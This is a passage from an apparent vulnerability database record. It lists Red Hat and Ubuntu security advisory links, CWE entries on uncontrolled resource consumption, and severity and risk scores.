reference_id RHSA-2026:2303
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2303
24
reference_url https://access.redhat.com/errata/RHSA-2026:2309
reference_id RHSA-2026:2309
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2309
25
reference_url https://access.redhat.com/errata/RHSA-2026:2453
reference_id RHSA-2026:2453
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2453
26
reference_url https://access.redhat.com/errata/RHSA-2026:2460
reference_id RHSA-2026:2460
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2460
27
reference_url https://access.redhat.com/errata/RHSA-2026:2483
reference_id RHSA-2026:2483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2483
28
reference_url https://access.redhat.com/errata/RHSA-2026:2486
reference_id RHSA-2026:2486
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2486
29
reference_url https://access.redhat.com/errata/RHSA-2026:2712
reference_id RHSA-2026:2712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2712
30
reference_url https://access.redhat.com/errata/RHSA-2026:2758
reference_id RHSA-2026:2758
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:2758
31
reference_url https://access.redhat.com/errata/RHSA-2026:3354
reference_id RHSA-2026:3354
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3354
32
reference_url https://access.redhat.com/errata/RHSA-2026:3359
reference_id RHSA-2026:3359
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3359
33
reference_url https://access.redhat.com/errata/RHSA-2026:3958
reference_id RHSA-2026:3958
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3958
34
reference_url https://access.redhat.com/errata/RHSA-2026:3959
reference_id RHSA-2026:3959
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:3959
35
reference_url https://access.redhat.com/errata/RHSA-2026:4138
reference_id RHSA-2026:4138
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4138
36
reference_url https://access.redhat.com/errata/RHSA-2026:4139
reference_id RHSA-2026:4139
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4139
37
reference_url https://access.redhat.com/errata/RHSA-2026:4140
reference_id RHSA-2026:4140
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4140
38
reference_url https://access.redhat.com/errata/RHSA-2026:4141
reference_id RHSA-2026:4141
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4141
39
reference_url https://access.redhat.com/errata/RHSA-2026:4142
reference_id RHSA-2026:4142
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4142
40
reference_url https://access.redhat.com/errata/RHSA-2026:4143
reference_id RHSA-2026:4143
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4143
41
reference_url https://access.redhat.com/errata/RHSA-2026:4144
reference_id RHSA-2026:4144
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4144
42
reference_url https://access.redhat.com/errata/RHSA-2026:4145
reference_id RHSA-2026:4145
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4145
43
reference_url https://access.redhat.com/errata/RHSA-2026:4146
reference_id RHSA-2026:4146
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4146
44
reference_url https://access.redhat.com/errata/RHSA-2026:4147
reference_id RHSA-2026:4147
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4147
45
reference_url https://access.redhat.com/errata/RHSA-2026:4148
reference_id RHSA-2026:4148
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4148
46
reference_url https://access.redhat.com/errata/RHSA-2026:4943
reference_id RHSA-2026:4943
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4943
47
reference_url https://access.redhat.com/errata/RHSA-2026:5606
reference_id RHSA-2026:5606
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:5606
48
reference_url https://usn.ubuntu.com/7975-1/
reference_id USN-7975-1
reference_type
scores
url https://usn.ubuntu.com/7975-1/
49
reference_url https://usn.ubuntu.com/8134-1/
reference_id USN-8134-1
reference_type
scores
url https://usn.ubuntu.com/8134-1/
Weaknesses
0
cwe_id 400
name Uncontrolled Resource Consumption
description The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.
1
cwe_id 770
name Allocation of Resources Without Limits or Throttling
description The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.
2
cwe_id 937
name OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.
3
cwe_id 1035
name OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.
Exploits
Severity_range_score7.0 - 8.9
Exploitability0.5
Weighted_severity8.0
Risk_score4.0
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-bptp-5gn6-eucd